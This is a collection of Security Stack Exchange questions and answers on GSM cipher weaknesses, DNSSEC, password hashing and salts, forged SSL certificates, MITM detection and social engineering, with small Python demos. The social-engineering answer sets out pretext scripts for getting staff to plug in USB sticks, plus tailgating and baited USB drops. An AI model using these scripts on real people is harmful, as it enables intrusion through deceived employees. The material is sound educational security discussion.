A5/1 is the old "strong" algorithm, used in Europe and North America. A5/2 is the old "weak" algorithm, nominally meant for "those countries who are good friends but that we do not totally trust nonetheless" (it is not spelled out that way in the GSM specifications, but that's the idea). A5/3 is the newer algorithm for GPRS/UMTS. A5/3 is a block cipher also known as KASUMI . It offers decent security. It has a few shortcomings which would make it "academically broken", but none really applicable in practice. A5/2 is indeed weak, as described in this report . The attack requires a fraction of a second, subject to a precomputation which takes less than an hour on a PC and requires a few gigabytes of storage (not much). There are technical details, mostly because the GSM protocol itself is complex, but one can assume that the A5/2 layer is breakable. A5/1 is stronger, but not very strong. It uses a 64-bit key, but the algorithm structure is weaker and allows for an attack with complexity about 2 42.7 elementary operations (see this article that I wrote 12 years ago). There have been several publications which turn around this complexity, mostly by doing precomputations and waiting for the algorithm internal state to reach a specific structure; although such publications advertise slightly lower complexity figures (around 2 40 ), they have drawbacks which make them difficult to apply, such as requiring thousands of known plaintext bits. With only 64 known plaintext bits, the raw complexity is 2 42.7 . I have not tried to implement it for a decade, so it is conceivable that a modern PC would run it faster than the workstation I was using at that time; as a rough estimate, a quad core PC with thoroughly optimized code should be able to crack it in one hour. The size of the internal state of A5/1, and the way A5/1 is applied to encrypt data, also make it vulnerable to time-memory trade-offs, such as rainbow tables . Again, see the Barkan-Biham-Keller article. 
This assumes that the attacker ran once a truly massive computation, and stored terabytes of data; afterwards, the online phase of the attack can be quite fast. Details very quite a bit, depending on how much storage space you have, how much CPU power is available for the online phase, and how long you are ready to wait for the result. The initial computation phase is huge but technologically doable (a thousand PC ought to be enough); there was an open distributed project for that but I do not know how far they went. SMS interception is still a specific scenario. It is not a full voice conversation; the actual amount of exchanged data is small, and the connection is over after a quite short time. This may limit the applicability of the attacks exposed above. Moreover, the attack must be fast: the point of the attack is to grab the secret password sent as a SMS, so that the attacker can use it before the normal user. The attacker must be quick: The server typically applies a short timeout on that password, such as a few minutes. SMS transmission is supposed to be a matter of a few seconds. The user is not patient (users never are). If he does not get his SMS within five minutes, he will probably request a new one, and a well-thought two-factor authentication system on the server would then invalidate the previous one-time password. Things are easier for the attacker if he already broke the first authentication factor (that's why we use two-factor authentication: because one is not enough). In that case, the attacker may initiate the authentication request while the target user is blissfully unaware of it, and thus unlikely to raise any alarm if he fails to receive a SMS, or, dually, if he receives an unwanted SMS (the attacker may do the attack late at night; the attacked user will find the unwarranted SMS only in the morning, when he wakes up, giving a few hours for the attacker to enact his mischiefs). GSM encryption is only for the radio link. In all of the above, we concentrated on an attacker who eavesdrop on data as sent between the mobile phone and the base station. The needed radio equipment appears to be available off-the-shelf , and it is easily conceived that this scenario is applicable in practice. However, the SMS does not travel only from the base station to the mobile phone. Its complete journey begins at the server facilities, then goes through the Internet, and then the provider's network, until it reaches the base station -- and only at that point does it get encrypted with whatever A5 variant is used. How is data secured within the provider's network, and between the provider and the server which wants the SMS to be sent, is out of scope of the GSM specification. So anything goes. Anyway, if the attacker is the provider, you lose. Law enforcement agencies, when they want to eavesdrop on people, typically do so by asking nicely to the providers, who invariably comply. This is why drug cartels, especially in Mexico and Colombia, tend to build their own cell networks . | {
"source": [
"https://security.stackexchange.com/questions/11493",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6869/"
]
} |
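The last paragraphs of the answer above lean on server-side hygiene for the one-time code: a short validity window, invalidation of the old code when a new one is requested, and single use. A minimal Python sketch of that policy follows; the 5-minute window and 6-digit format are arbitrary assumptions, and a real system would add rate limiting and audit logging.

import secrets, time

CODE_TTL = 300                     # assumed 5-minute validity window
_active = {}                       # user -> (code, expiry); at most one live code per user

def issue_code(user):
    code = f"{secrets.randbelow(10**6):06d}"
    _active[user] = (code, time.time() + CODE_TTL)   # re-issuing overwrites (invalidates) any older code
    return code                                      # handed to the SMS gateway

def verify_code(user, attempt):
    code, expiry = _active.get(user, (None, 0.0))
    if code is None or time.time() > expiry:
        return False
    if secrets.compare_digest(code, attempt):
        del _active[user]                            # single use: consume the code on success
        return True
    return False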
11,510 | Yesterday, I got an alert from a client's IDS that a Base64 auth packet was detected. Looking at the ASCII decode, I can see that it is for their OWA (Outlook Web Access), and indeed, the auth info was Base64, easily decoded to the username/password of a user. What is odd, is that this company's Exchange server is setup to never allow connections unencrypted (via HTTP or POP/SMTP). It will always redirect http to https before authentication is required. Since getting this alert, I have queried for other alerts of the same kind, but cannot find much more... It seems to be an edge case. Any ideas on what is going on? =====Ascii Decode of packet====
GET./.HTTP/1.1
Host:.xxxxxx.com
User-Agent:.Mozilla/5.0.(iPod;.CPU.iPhone.OS.5_0_1.like.Mac.OS.X).AppleWebKit/534.46.(KHTML,.like.Gecko).Version/5.1.Mobile/9A405.Safari/7534.48.3
Accept:.text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Authorization:.Basic.xxxxxxxxxxxxxxxxx==
Accept-Language:.en-us
Accept-Encoding:.gzip,.deflate
Cookie:.UserContext=ecc88b90b86c483f89db34eb673c259c;.OwaLbe={A907E8ED-3881-4B44-B84E-F036E6485722}
Connection:.keep-alive | | {
"source": [
"https://security.stackexchange.com/questions/11510",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/44/"
]
} |
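The question's point that the Basic credentials were "easily decoded" is worth seeing concretely: HTTP Basic authentication is base64, which is an encoding rather than encryption, so anyone who captures the header on an unencrypted hop can read the password. A small Python sketch (the header value is a made-up example, not the one from the capture):

import base64

header = "Authorization: Basic YWxpY2U6cyNjcjN0IQ=="      # hypothetical example value
token = header.split("Basic ", 1)[1]
user, _, password = base64.b64decode(token).decode("utf-8").partition(":")
print(user, password)                                      # alice s#cr3t!

This is why Basic auth is only acceptable inside TLS; the interesting part of the original question is how such a request left the network unencrypted in the first place.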
11,566 | Based on information from this site , DNSSec is needed to protect us from a number of DNS and SSL / TLS hacks, including: DNS spoofing , especially on wifi or shared medium Registrars that abuse their trust and insert invalid data into the root servers Fundamental flaws that allow attacks on SSL & HTTPS connections I haven't yet seen a good explanation of how DNSSec works outside of the RFC's, so: How does DNSSec work? Are there known limitations I should be aware of? Specifically, how to we prevent the case where a MITM hides the "secure" records from being seen on the client, and the client uses insecure DNS? (a variant of this hack ) | DNSSec is normal DNS, but with signatures. It absolutely prevents DNS Spoofing; that's what it's for, and that's what it does. Registrars can still theoretically abuse their position because they're responsible for communicating your intentions to the root servers. This includes information about your DNSSec keys. This relationship will never change; if you can't trust your registrar, then get a new registrar. DNSSec doesn't prevent MITM attacks. It absolutely prevents DNS spoofing. But there are other ways of inserting yourself into a traffic flow than just DNS spoofing. How it works In essence, you tell your registrar your signing key's fingerprint by creating a DS record, and that information will be available from your TLD signed by an upstream key which chains in a like manner all the way to a single globally trusted key. With this set up, your key is now considered to be the trusted authority for your domain, and is allowed to sign your DNS records. So now for each record in your zone, you create a corresponding RRSIG record which contains the associated digital signature. Now, when someone looks up a domain in your zone, you can send not only the response, you can also send the corresponding RRSIG record as well which shows that the response was signed by you. To verify the signature, the client fetches your DNSKEY record which contains your full public key, and then just follows normal cryptographic signature verification techniques. Obviously the DNSKEY record also has its own corresponding RRSIG record so that you can verify that it hasn't been tampered with. But more importantly, there is a DS record available from your parent zone (remember, you gave it to your registrar in the first paragraph) which contains enough information about your public key to verify that your DNSKEY record is actually authorized for your zone. That DS record is, in turn, singed by your parent's DNSKEY, for which there is a corresponding DS record in the root zone. This way, all key signatures can be traced back to a single trusted source. Problems The complication comes when you need to tell someone that a record doesn't exist. Obviously that response needs to be signed, but generally the DNS server itself doesn't have access to your signing key and can't sign the response on-the-fly; the signatures are all created "offline" ahead of time. This keeps your key from being exposed if your DNS server gets compromised. So instead, you alphabetize your subdomains and say "for every name between mail.example.com and pop.example.com , no other subdomains exist" and sign that assertion. 
Then when someone asks for nachos.example.com you can just give them that response (which has already been signed) and the client knows that because nachos.example.com falls alphabetically between mail.example.com and pop.example.com , then the "this domain doesn't exist" response is considered to be correctly signed and actually came from you. The place where this becomes problematic is that by having a set of these negative responses which explicitly state that "no responses exist between X and Y , you can easily map out exactly which domains exist for the entire zone. You know that "X" exists, and you know that "Y" exists, and you know there is nothing else between them. Just do a little more poking at random and you'll quickly be able to compile a list of all the records that do exist. Controversy There are two camps in the DNS world with respect to whether or not this is a problem. The first group says: "So what if people know what zones exist; DNS is public information . It was never meant to be a secret anyway." To which the second group says: "This is a security risk. If I have a server named accounting.example.com , then someone who intrudes on my network can quickly tell which machine has the juicy information on it and therefore which one to attack." To which the first group then replies: "Then don't call it that! If your entire security model is based on the concept of keeping public information secret, then you, sir, are an idiot." To which the second group replies: "It's not about keeping secrets, it's about not revealing more information than you have to." And so on, ad nauseam. DNS (and DNSSec) was designed largely by folks in the first camp; DNS is public, therefore being able to map out which subdomains exist in a domain isn't a significant security concern. And anyway, you can't really do signed negative responses any other way. On the other hand, the servers tend to be run by people in the second camp. They're concerned about the safety of their own network, and they don't want to be giving away any more information than necessary, since they know that all information will eventually be used against them. So you have a protocol is cryptographically sound and perfectly functional, but which real-world admins tend to be hesitant to implement. We'll all get there eventually, I imagine. After all, DNS spoofing is more of a real-world concern than any dangers raised by mapping out subdomains. But change takes convincing. So here we are... still. | {
"source": [
"https://security.stackexchange.com/questions/11566",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/396/"
]
} |
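The zone-enumeration issue described in the "Problems" section above is easy to see with a toy model. This is not real DNSSEC (real NSEC records use canonical DNS ordering and carry signatures); it is a pure-Python sketch with made-up names showing how signed "nothing exists between X and Y" answers let an outsider walk the whole zone:

import bisect

zone = sorted(["accounting.example.com", "mail.example.com",
               "pop.example.com", "vpn.example.com", "www.example.com"])   # the server's secret contents

def denial(qname):
    # Stand-in for a signed denial: return the (previous, next) existing names around qname.
    i = bisect.bisect_left(zone, qname)
    if i < len(zone) and zone[i] == qname:
        return qname, qname                      # the name exists
    prev = zone[i - 1] if i > 0 else zone[-1]    # wrap around, as NSEC does
    nxt = zone[i] if i < len(zone) else zone[0]
    return prev, nxt

found, cursor = [], "a"
while True:
    prev, nxt = denial(cursor)
    name = nxt if prev != nxt else prev
    if name in found:
        break
    found.append(name)
    cursor = name + "\x00"                       # a name lexicographically just past the last one seen
print(found)                                     # the whole zone, recovered purely from denial answers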
11,625 | I read somewhere that adding a salt at the beginning of a password before hashing it is a bad idea. Instead, the article claimed it is much more secure to insert it somewhere in the middle of the password. I don't remember where I found this, and I cannot find any other articles saying the same thing. I also don't understand why this may increase security. So, is it true? Or does it not matter from a security perspective? If the assertion is true, can somebody explain why? Is it valid only for weak hashes, like MD5/SHA1? | What this article could have meant is that putting the salt somewhere in the middle of the password supposedly increases the chance of being cracked by a dictionary attack or by brute force, because the rules to actually compose the same hash could not be implemented in your password cracker of choice. In reality, this is probably complete nonsense. How does this work? If you take a program like John the Ripper , you feed it with your password file like so (not the exact syntax): username:password:salt Then you pass the format as a parameter that you think the hash is generated with. This can be: md5(pass + salt)
md5(salt + pass)
md5(md5(pass) + md5(salt))
md5(pass + md5(salt))
md5(md5(...(salt + pass + salt)...))
...
and whatnot. John the Ripper comes with a premade set of about 16 subformats you get to choose from. Putting the salt somewhere in the password would probably look like that: md5(password.substring(0,4) + salt + password.substring(4,end)) So, using a technique like this requires you to write a small plugin for John at first, before you can start cracking (which shouldn't be a problem at all). In addition, you, as an attacker, might have a list of hashes + salts of unknown origin and have no knowledge about the way how a hash is composed. This is rarely the case. If you, as an attacker, manage to extract hashes and salts from a database, you probably either find a way to extract the password hashing algorithm of the website or you just create a new account with a known password, extract the hash and salt for it and brute force the algorithm that was used to compose the final hash (which can be more or less challenging). All in all, it is almost completely arbitrary where you put the salt and whether or not you iterate the hashing algorithm ten thousand times or not. This does NOT provide a significant amount of security. If you want security, you can do way better by using a better hashing algorithm or bcrypt or something else that is computationally expensive. | {
"source": [
"https://security.stackexchange.com/questions/11625",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7684/"
]
} |
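The core claim above, that where you splice the salt in only changes the "format" a cracker has to plug in, is easy to demonstrate. A short Python sketch using hashlib (MD5 only to match the answer; the salt and wordlist are made up):

import hashlib

def md5(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()

rules = {
    "md5(salt + pass)":            lambda pw, salt: md5(salt + pw),
    "md5(pass[:4] + salt + rest)": lambda pw, salt: md5(pw[:4] + salt + pw[4:]),
}

salt = b"x9Qz"
stored = rules["md5(pass[:4] + salt + rest)"](b"dragon123", salt)   # what sits in the stolen database

wordlist = [b"letmein", b"monkey", b"dragon123", b"qwerty"]
for name, rule in rules.items():
    hits = [pw for pw in wordlist if rule(pw, salt) == stored]
    print(f"{name:30} cracked: {hits}")

Only the rule that matches the application's composition recovers the password, and writing that rule is a few lines of work, so the unusual placement adds essentially no security; slow, salted constructions like bcrypt are what actually raise the attacker's cost.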
11,700 | I am working as a tester now. I am planning to move to the domain of security such as a CEH or CISSP. But many say that to be a great hacker you need to know at least one programming language well. I already know a bit of Java. But I just wanted to know which language is closer to network security and related domains. So what kind of language should I be learning so that it would be helpful for me to move to the domain of security? | There is no defined blueprint on what is the best language to learn. Therefore I would like to mention two good alternatives that I (and many others) think are good languages to learn in computer security. Lua Explanation of Lua from Wikipedia : Lua is a lightweight multi-paradigm programming language designed as a scripting language with "extensible semantics" as a primary goal. The reason I mention Lua as a good language to learn is that it is the scripting engine for MANY popular security tools. This is a very good reason alone to learn this language. Some of these tools include: NMAP (Network mapping tool) Snort (Open source IDS) Wireshark (Packet sniffing tool) Vim (Very popular unix text editor) Cisco ASA (firewall, IPS, VPN) Network services tools (Apache, lightHttpd, FreePop) On a side note: Even Blizzard's major hit World of Warcraft has support for Lua scripting inside the game :) To whomever that may be relevant. Python I am a bit biased towards Python after having started reading the book " Gray Hat Python: Python Programming for Hackers and Reverse Engineers ". I agree with many of the points from this book about why it is a good language to learn for a hacker (commonly known as a security specialist :)). Quoted from Amazon: Python is a good language to learn because: it's easy to write quickly, and it has the low-level support and libraries that make hackers happy. It is also very comfortable to be able to interact on the fly with the interpreter in your Python shell. Edit: Graphical view of HackerNews polls on favorite/disliked programming languages: Edit 2: From Digininja's poll : Language Number Percentage
Python 245 81%
Bash Scripting 241 79%
Ruby 127 42%
C 123 40%
Windows Powershell 111 37%
Batch Scripting 108 36%
PHP 107 35%
C++ 66 22%
Java 65 21%
Perl 57 19%
Other 57 19%
VB 29 10%
C# 26 9%
Lua 23 8% | {
"source": [
"https://security.stackexchange.com/questions/11700",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5863/"
]
} |
11,717 | Why can't a password hash be reverse engineered? I've looked into this ages ago and have read lots on it, but I can't find the explanation of why it can't be done. An example will make it easier to understand my question and to keep things simple we will base it on a hashing algorithm that doesn't use a salt ( LanMan ). Say my password is "Password". LanMan will hash this and store it in the database. Cracking programs can brute force these by hashing password guesses that you provide. It then compares the generated hash to the hash in the database. If there is a match, it works out the password. Why, if the password cracker knows the algorithm to turn a plain text password into a hash, can't it just reverse the process to calculate the password from the hash? This question was IT Security Question of the Week . Read the Feb 24, 2012 blog entry for more details or submit your own Question of the Week. | Let me invent a simple "password hashing algorithm" to show you how it works. Unlike the other examples in this thread, this one is actually viable, if you can live with a few bizarre password restrictions. Your password is two large prime numbers, x and y. For example: x = 48112959837082048697
y = 54673257461630679457 You can easily write a computer program to calculate xy in O( N ^2) time, where N is the number of digits in x and y. (Basically that means that it takes four times as long if the numbers are twice as long. There are faster algorithms, but that's irrelevant.) Store xy in the password database. x*y = 2630492240413883318777134293253671517529 A child in fifth grade, given enough scratch paper, could figure out that answer. But how do you reverse it? There are many algorithms people have devised for factoring large numbers, but even the best algorithms are slow compared to how quickly you can multiply x by y. And none of those algorithms could be performed by a fifth grader, unless the numbers were very small (e.g., x=3, y=5). That is the key property: the computation is much simpler going forwards than backwards. For many problems, you must invent a completely new algorithm to reverse a computation. This has nothing to do with injective or bijective functions. When you are cracking a password, it often doesn't matter if you get the same password or if you get a different password with the same hash. The hash function is designed so it is hard to reverse it and get any answer at all, even a different password with the same hash. In crypto-speak: a hash function vulnerable to a preimage attack is utterly worthless. (The password hashing algorithm above is injective if you have a rule that x < y. ) What do cryptography experts do? Sometimes, they try to figure out new algorithms to reverse a hash function (pre-image). They do exactly what you say: analyze the algorithm and try to reverse it. Some algorithms have been reversed before, others have not. Exercise for the reader: Suppose the password database contains the following entry: 3521851118865011044136429217528930691441965435121409905222808922963363310303627 What is the password? (This one is actually not too difficult for a computer.) Footnote: Due to the small number of passwords that people choose in practice, a good password hash is not merely difficult to compute backwards but also time-consuming to compute forwards, to slow down dictionary attacks. As another layer of protection, randomized salt prevents the use of precomputed attack tables (such as "rainbow tables"). Footnote 2: How do we know that it is hard to reverse a hash function? Unfortunately, we don't. We just don't know any easy ways to reverse hash functions. Making a hash function that is provably difficult to reverse is the holy grail of hash function design, and it has not been achieved yet (perhaps it will never happen). | {
"source": [
"https://security.stackexchange.com/questions/11717",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7766/"
]
} |
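To put rough numbers on the forward/backward asymmetry in the answer above, here is a short Python sketch. It multiplies the two primes from the answer instantly and then runs naive trial division on a much smaller product; the factoring loop is deliberately the dumbest possible "reverse the function" approach, and the big product is left alone because that loop would need on the order of 10^19 iterations for it.

import time

x = 48112959837082048697
y = 54673257461630679457

t0 = time.perf_counter()
n = x * y                                   # the forward direction: trivial
print(n, f"(multiplied in {time.perf_counter() - t0:.6f}s)")

def trial_division(n):
    # Naive reversal: test every odd candidate factor up to sqrt(n).
    if n % 2 == 0:
        return 2
    f = 3
    while f * f <= n:
        if n % f == 0:
            return f
        f += 2
    return n

t0 = time.perf_counter()
small = 999983 * 1000003                    # a toy product of two known ~10^6 primes
print(trial_division(small), f"(factored in {time.perf_counter() - t0:.3f}s)")
# For x*y above the same loop needs roughly 2.5e19 iterations; going backward
# requires a fundamentally better algorithm, and for good hashes no efficient reversal is known.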
11,832 | In the news that comes from Iran, you hear that Iran has succeeded in making fake SSL certificates, so that they can find people's Gmail account credentials. Some analysts are saying this is possible but difficult. I wonder why it's difficult, where the difficulty lies, and why your ISP can't do that to you? | Let me explain via a practical example. There is a set of Certificate Authorities (CAs) that browsers implicitly trust. You can see the list of trusted CAs in your browser. For example, the CAs trusted by the Chrome browser can be found at "Wrench Menu > Preferences > Under the Hood > HTTPS/SSL (Manage Certificates) > Authorities tab". So, the certificate that mail.google.com presents to your browser is 'signed' by Thawte SGC CA. This CA is implicitly trusted by the browser. These CAs will issue certificates only after thorough (and manual) verification. You and I cannot trick Thawte or Verisign into signing us a fake certificate for Google. Such cases do happen, but they are rare and mostly require some insider help. Now, on your own machine, you can go ahead and create certificates claiming to be for google.com. But these certs are 'self-signed' and will not be trusted by the browser because the CA (you) is not in its trusted certificates list. In this case, the browser will show you a certificate warning. So, now to answer your question, there are a couple of ways in which spoofed certificates are created (or made to work): Just as I mentioned above, a person can trick a CA (which is trusted by the browser) into issuing you a certificate for a site which doesn't belong to you. For this reason people often manually remove trusted CAs from their list. God knows what procedures that CA in that never-heard-of country follows. I've seen paranoid people removing CAs from the browser's trusted list. The CA gets hacked (or is made to issue fake certs). In such a case you can issue certs at will. Not to mention, such CAs immediately go out of business once this is found. You can also have a fake "self-signed" certificate for google.com and still manage to bypass the browser security check if you explicitly add your own CA to the browser's trusted list. Companies can do it. I've seen (and worked at) companies where they openly do it for "Compliance reasons". Since your desktop machines are under their control, they install their own CA into your browser's trusted store and present a fake Gmail cert to the browser - which the browser trusts - and they happily intercept ALL your conversations/emails. In all the cases - what do you get by faking a certificate: you can MITM (man in the middle) the server and the user's computer and decrypt the SSL session. I've left many finer nuances of certificate creation out of my description above to present a broad picture. You can read about Cert Patrol and Perspectives to see how you can avoid falling victim to a fake certificate even if its CA is in the browser's trusted list. You can also read about certificate pinning, which can help prevent such certificate hijacks. | {
"source": [
"https://security.stackexchange.com/questions/11832",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7792/"
]
} |
11,839 | I mean, is it just a matter of "how difficult is it to reverse the function with the current technology"? Or is there a mathematical concept or property that makes them different? If it is a matter of "how difficult is it to reverse the function", then is it correct to say that with the progress of the technology, some Cryptographic Hash Functions stop being Cryptographic to be just Hash Functions? Is this what happened to MD5? | Every cryptographic hash function is a hash function. But not every hash function is a cryptographic hash. A cryptographic hash function aims to guarantee a number of security properties. Most importantly that it's hard to find collisions or pre-images and that the output appears random. (There are a few more properties, and "hard" has well defined bounds in this context, but that's not important here.) Non cryptographic hash functions just try to avoid collisions for non malicious input. Some aim to detect accidental changes in data (CRCs), others try to put objects into different buckets in a hash table with as few collisions as possible. In exchange for weaker guarantees they are typically (much) faster. I'd still call MD5 a cryptographic hash function, since it aimed to provide security. But it's broken, and thus no longer usable as a cryptographic hash. On the other hand when you have a non cryptographic hash function, you can't really call it "broken", since it never tried to be secure in the first place. | {
"source": [
"https://security.stackexchange.com/questions/11839",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7796/"
]
} |
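A quick way to feel the difference described above: colliding a non-cryptographic 32-bit checksum such as CRC-32 takes a fraction of a second of blind guessing (the birthday bound is around 2^16 inputs), while no SHA-256 collision has ever been exhibited. A Python sketch (the 8-byte random tokens are an arbitrary choice for the demo):

import os, zlib

seen = {}
for attempts in range(1, 2_000_000):
    token = os.urandom(8)
    c = zlib.crc32(token)
    if c in seen and seen[c] != token:
        print(f"CRC-32 collision after {attempts} random inputs:")
        print(seen[c].hex(), "and", token.hex(), "both map to", hex(c))
        break
    seen[c] = token

# Swapping zlib.crc32(token) for hashlib.sha256(token).digest() turns the same
# loop into a ~2**128-attempt problem: that gap is the "cryptographic" part.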
11,920 | I've recently finished book The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick The book was released on 4th December 2002. Not talking only about techniques described in this book, but are the ways used by social-engineers still a threat today? I think that now, as we moved at least 10 years from the book and issues described in it, we should be immune to such attacks, as we can quickly verify any information presented to us and with possibilities to use cyphering, high-speed mobile network connections, privileges control systems, biometric identification, etc... Do I live in false sense of safety, or is it fear speaking from me? And now you can think about, whether it was an social engineering to ask such question and get all your valuable knowledge, or not. :-) | You most definitely live in a sense of false security! Social engineering is very prevalent still today, and I doubt that is about to change in decades if ever. Here are some brief explanations on why social engineering works. It's tough to cover everything because social engineering is a really broad field. Some reasons why social engineering works (From the book quoted in the bottom): Most people have the desire to be polite, especially to strangers Professionals want to appear well-informed and intelligent If you are praised, you will often talk more and divulge more Most people would not lie for the sake of lying Most people respond kindly to people who appear concerned about them Being helpful Usually humans want to be helpful to each other. We like doing nice things! I run into the reception at a big corporate office with my papers soaked in coffee. I talk to the receptionist and explain that I have a job interview meeting in 5 minutes, but I just spilled coffee over all my papers. I then ask if the receptionist could be so sweet and print them out again for me with this USB memory stick that I have. This might lead to an actual infection of the receptionist's PC and may gain me a foothold within the network. Using fear The fear of failing or not doing as ordered: The company's director's (John Smith) facebook page (or whatever other source of information) reveals that he has just left on a cruise for 3 weeks. I call the secretary and with a commanding voice I say "Hi, it's Chris calling. I just got off the phone with John Smith, he's having a very good time on his cruise with his wife Carla and kids. However, we are in the midst of integrating a very important business system and he told me to give you a call so you can help us. He couldn't call himself because they are going on a safari, but this is really urgent. All you need to do is take the USB stick that is addressed to him in the mail and plug it in, start the computer and we are all done. The project survives! Thank you very much! You have been a great help! I am sure John Smith will recognize you for this act of helpfulness. " Playing on reciprocation The tailgate. I hold the entry door for you, and I quickly walk behind you. When you open the next door, which is security enabled, I head in the same direction and most people will try and repay the helpful action by holding the door for you again, thus allowing you into a place where you should not be. Worried about getting caught? Nah.. You just say you're sorry and that you went the wrong way. The target would almost feel obliged to hold the door for you! Exploiting the curiosity Try dropping 10 USB sticks in various locations in your organization. 
You don't have to place them in too obvious places. The USB stick should have an auto-run phone-home program so you can see when someone connects it and, in theory, gets exploited. Another version of this is to drop USB sticks with a single PDF document that is called e.g. "John Smith - Norway.pdf". The PDF document contains an Adobe Acrobat Reader exploit (there are tons of them) and once the user clicks the document he will be owned. Of course, you have made sure that the exploit is tailored to the target organization's specific version of Adobe. It will feel natural for most people to open the document so that they can try to return the USB stick to its owner. Another example of curiosity (maybe another term explains this better) is all those spam mails or shady Internet ads claiming that you have won something or that a Nigerian prince is offering you a whole lot of money if you can help him. I am sure you are familiar with these already, but these are also social engineering attacks, and the reason they haven't stopped is that they still work! Those are just a few examples. Of course there are tons more! We can also take a look at historic social engineering events: HBGary The full story can be read here (page 3 contains the social engineering part). Last year HBGary was hacked. This attack involved many different steps, but it had a social engineering aspect as well. Long story short, the hacker compromised the email account of a VIP in the company and sent an email to an administrator of the target system saying something like this: "Hi John, I am currently in Europe and I'm bouncing between airports. Can you open up SSH on a high numbered port for me coming from any IP? I need to get some work done". When the administrator gets this email he feels it is natural to comply, seeing as the email is coming from a trusted source. But that is not all! The attacker had the password for the account, but the login was not working! So he emails back to the administrator: "Hey again, it does not seem to be working. The password is still right? What was the user-name again?". Now he has also provided the actual password for the system (the attacker had it from the earlier compromise of another system in the same hack), giving the attacker a whole lot more trust from the administrator. So of course the administrator complies and tells the attacker his username. The list at the top comes from the book " Social Engineering: The Art of Human Hacking " and I can very highly recommend it! | {
"source": [
"https://security.stackexchange.com/questions/11920",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5367/"
]
} |
12,041 | In "Some thoughts on the iPhone contact list controversy and app security" , cdixon blog Chris Dixon makes a statement about web security Many commentators have suggested that a primary security risk is the fact that the data is transmitted in plain text. Encrypting over the wire is always a good idea but in reality “man-in-the-middle” attacks are extremely rare. I would worry primarily about the far more common cases of 1) someone (insider or outsider) stealing in the company’s database, 2) a government subpoena for the company’s database. The best protection against these risks is encrypting the data in such a way that hackers and the company itself can’t unencrypt it (or to not send the data to the servers in the first place). I am wondering if there is any cold, hard, real world data to back up that assertion -- are "man in the middle" attacks actually rare in the real world, based on gathered data from actual intrusions or security incidents? | My favorite current resource for cold, hard, real world data is the Verizon 2011 Data Breach Investigations Report . An excerpt from page 69 of the report: Actions The top three threat action categories were
Hacking, Malware, and Social. The most common
types of hacking actions used were the use of
stolen login credentials, exploiting backdoors,
and man-in-the-middle attacks. From reading that, I infer that it's a secondary action used once somebody has a foothold in the system, but the Dutch High Tech Crime Unit's data says it's quite credible for concern. Of the 32 data breaches that made up their statistics, 15 involved MITM actions. Definitely don't stop there, though. That entire report is a gold mine of reading and the best piece of work that I've come across for demonstrating where threats are really at. For fuzzier references to MiTM attacks and methods, see also this excellent answer to MITM attacks - how likely are they? on Serverfault. I would go further in saying that any instance of a SSL root coughing up a bad cert is a sign of an attack, otherwise they'd be pretty useless compromises. Finally, because I'm that guy , I would definitely try to splice into your network box outside the building if I were doing your pentest. One can do amazing things with a software radio even on a wired connection. | {
"source": [
"https://security.stackexchange.com/questions/12041",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/56/"
]
} |
12,066 | Based on this question here: Are "man in the middle" attacks extremely rare? Is it possible to detect man-in-the-middle attacks, and if so, how would one go about it? In addition, what if the attack is taking place via connecting into the local network, such as phone lines? Is there any way to detect it? | While browsing, you can check every time whether the certificate that is presented to you by the website is issued by a legitimate CA or is a fake certificate issued by some CA that your browser trusts. Obviously it is not possible to do this manually every time. So, there are tools that do it for you. Cert Patrol and Perspectives are browser plugins that do essentially that. They keep a note of which domain names are issued by which CAs (e.g. Google => Thawte, etc.) and many other parameters related to the certificates, and will alert the user if either the CA changes OR the public key in the cert changes. These do not detect a MITM directly; they are more like prevention schemes that work by detecting that something is odd about the certificate presented by the website. Also, while connecting to an SSH server, the client asks you to confirm the server fingerprint. I'd be alarmed if my SSH client presented me a new fingerprint after I've previously connected to a server. The server host key gets saved to the known_hosts file after the first connection; the only reason the client is asking me to validate the fingerprint again is that either the SSH server has been reinstalled/updated OR I am being MITMed. Absolute paranoia demands that you call the system admin on the phone and confirm the fingerprint by having him read out the key. | {
"source": [
"https://security.stackexchange.com/questions/12066",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1229/"
]
} |
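The Cert Patrol / known_hosts idea in the answer above (remember what the site presented last time and complain when it changes) can be scripted in a few lines. A Python sketch using only the standard library; the host and cache file name are arbitrary, and a real tool would track the whole chain and issuing CA rather than just pinning the leaf certificate's fingerprint:

import ssl, hashlib, json, os

CACHE = "known_certs.json"                       # arbitrary local pin store

def fingerprint(host, port=443):
    pem = ssl.get_server_certificate((host, port))
    return hashlib.sha256(ssl.PEM_cert_to_DER_cert(pem)).hexdigest()

def check(host):
    known = json.load(open(CACHE)) if os.path.exists(CACHE) else {}
    fp = fingerprint(host)
    if host not in known:
        known[host] = fp                         # trust on first use, like SSH does
        print(f"first visit to {host}, pinning {fp[:16]}...")
        json.dump(known, open(CACHE, "w"))
    elif known[host] != fp:
        print(f"WARNING: certificate for {host} changed; possible MITM (or a legitimate renewal)")
    else:
        print(f"{host}: certificate unchanged")

check("www.example.com")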
12,071 | I am using .NET 4.0 to develop a Windows service that will temporarily store encrypted data in a database. The data will be encrypted when it is inserted, then decrypted, processed, and deleted once processed. This will probably be done as a batch process (thousands of rows at a time). I've looked at Generating Keys for Encryption and Decryption on MSDN, and it looks like I could use TripleDES symmetric encryption (I was thinking of using the RijndaelManaged class). However, if the service fails or I lose my database connection while I am encrypting and inserting the data, I want to be able to pick up where I left off with the same IV and key. How should I store my IV and key on a local computer? I want to be sure it will not be found and used to decrypt the encrypted contents of the database. | At least one thing you can improve rather easily: You can simply store the IV in the database next to the encrypted data. The IV itself is not supposed to be secret . It usually acts as a salt, to avoid a situation where two identical plaintext records get encrypted into identical ciphertext. Storing the IV in the database for each row will eliminate the concern over losing this data. Ideally, each row IV would be unique and random but not secret. That leaves your problem to storing a relatively small piece of information: the key . There should be no issue using the same key for all records in terms of security. As long as the key itself is strong, using a different key does not give you any advantage (in fact, it will be a real headache to manage), so one key should usually be good enough. There are probably many solutions to storing 